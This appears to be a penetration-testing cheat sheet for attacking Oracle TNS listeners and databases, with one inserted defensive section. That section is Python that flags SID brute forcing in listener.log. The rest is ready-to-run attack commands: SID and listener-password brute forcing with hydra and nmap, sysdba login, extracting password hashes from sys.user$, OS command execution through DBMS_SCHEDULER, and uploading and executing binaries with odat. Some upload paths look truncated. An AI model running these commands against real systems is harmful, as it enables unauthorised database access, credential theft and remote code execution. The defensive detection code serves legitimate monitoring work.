In Oracle SQL, a SID (Service Identifier) is basically a database.
Enumeration
Get general information
tnscmd10g -h $target
Try to get a SID:
tnscmd10g status -p 1521 -h $target
Another tool: Oracle Scanner
oscanner -s $target -P 1521
Metasploit module
scanner/oracle/tnslsnr_version
Brute force SID
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid
nmap --script oracle-sid-brute -p 1521 $target
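From the defender's side, the SID guessing above leaves a clear trace in the listener's listener.log: a run of "establish" records from one source address, each ending in TNS-12505 (unknown SID) or TNS-12514 (unknown service name), usually preceded by a listener status/version probe. The following Python is an added example, not code from the original page; it assumes the usual listener.log record layout and runs over a constructed log excerpt.

```python
import re
from collections import defaultdict

# Constructed listener.log excerpt (sample data, not from the original page): one normal
# connection, a listener "status" probe, and three unknown-SID attempts from one address.
SAMPLE_LOG = """\
03-MAY-2024 09:15:01 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.5)(PORT=51234)) * establish * XE * 0
03-MAY-2024 09:16:10 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=scanner)(USER=root))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=186647552)) * status * 0
03-MAY-2024 09:16:11 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=40001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
03-MAY-2024 09:16:11 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=40002)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
03-MAY-2024 09:16:12 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=40003)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
"""

# "establish" records: connect descriptor, then the client ADDRESS block (the reliable
# source of the peer IP), the requested SID/service name and the TNS return code.
ESTABLISH_RE = re.compile(
    r"^\S+ \S+ \* \(CONNECT_DATA=.*?\) \* \(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\)"
    r".*? \* establish \* (?P<sid>\S+) \* (?P<rc>\d+)$")
# Listener admin commands (status, version, services ...) as sent by tools like tnscmd10g.
COMMAND_RE = re.compile(r"^\S+ \S+ \* \(CONNECT_DATA=.*\(COMMAND=(?P<cmd>\w+)\).*\) \* \w+ \* \d+$")
# 12505: unknown SID; 12514: unknown SERVICE_NAME. Either means the name was guessed.
UNKNOWN_NAME_CODES = {"12505", "12514"}


def summarize(log_text):
    """Return (per-source stats of failed name lookups, list of listener commands seen)."""
    per_host = defaultdict(lambda: {"unknown_sid": 0, "sids": set()})
    commands = []
    for line in log_text.splitlines():
        m = ESTABLISH_RE.match(line)
        if m:
            if m["rc"] in UNKNOWN_NAME_CODES:
                per_host[m["host"]]["unknown_sid"] += 1
                per_host[m["host"]]["sids"].add(m["sid"])
            continue
        m = COMMAND_RE.match(line)
        if m:
            # Command records carry no ADDRESS block and the HOST inside CID is
            # client-supplied, so only the command itself is recorded here.
            commands.append(m["cmd"])
    return per_host, commands


def flag_sid_bruteforce(log_text, threshold=3):
    """Source addresses that failed SID/service lookups at least `threshold` times."""
    per_host, _ = summarize(log_text)
    return sorted(h for h, s in per_host.items() if s["unknown_sid"] >= threshold)
```

Tune the threshold to the environment; a handful of 12505s from a misconfigured client is normal, dozens of distinct SIDs from one address in a few seconds is not.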
Brute force credentials
Brute force the listener password (only a password is needed, no username):
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 $target oracle-listener
Or use odat:
odat all -s $target -p 1521 [-d XE]
Command line enumeration
You probably want to use XE as $dbname.
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib
sqlplus $user/$pass@$target/$dbname 'as sysdba'
Enumerate version
select * from v$version;
Enumerate users
select * from all_users;
Get all user information, including password hashes (see this article for background: since the migration from version 10, the hash is stored in spare4):
select name,password,spare4 from sys.user$;
Execute a command via the scheduler:
exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','ping 10.10.14.12',0,TRUE);
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2008JOB',program_name => 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2008');
Upload and execute as the DB admin (System?!)
odat utlfile -s $target -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp mps64.exe mps64.exe --sysdba
odat externaltable -s $target -p 1521 -U "scott" -P "tiger" -d XE --exec C:\ s64.exe --sysdba